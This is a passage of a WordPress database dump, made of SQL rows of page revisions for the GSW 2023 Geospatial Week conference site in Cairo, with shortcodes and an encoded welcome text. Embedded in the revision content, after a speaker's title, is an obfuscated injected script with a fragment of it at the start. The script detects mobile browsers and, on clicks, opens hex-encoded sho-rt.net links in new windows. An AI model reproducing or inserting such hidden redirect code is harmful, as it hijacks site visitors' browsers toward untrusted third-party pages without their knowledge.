)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','wellcome','','inherit','closed','closed','','3233-revision-v1','','','2022-11-09 21:21:09','2022-11-09 21:21:09','',3233,'https://gsw2023.com/?p=3238',0,'revision','',0),
(3239,1,'2022-11-09 21:22:23','2022-11-09 21:22:23','[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\n<h6>Geospatial Week Director ,The University of Calgary</h6>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','wellcome','','inherit','closed','closed','','3233-revision-v1','','','2022-11-09 21:22:23','2022-11-09 21:22:23','',3233,'https://gsw2023.com/?p=3239',0,'revision','',0),
(3241,1,'2022-11-09 21:24:13','2022-11-09 21:24:13','','0 Where to Stay in Cairo','','inherit','open','closed','','0-where-to-stay-in-cairo','','','2022-11-09 21:24:13','2022-11-09 21:24:13','',3233,'https://gsw2023.com/wp-content/uploads/2022/11/0-Where-to-Stay-in-Cairo.jpg',0,'attachment','image/jpeg',0),
(3242,1,'2022-11-09 21:24:56','2022-11-09 21:24:56','[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRz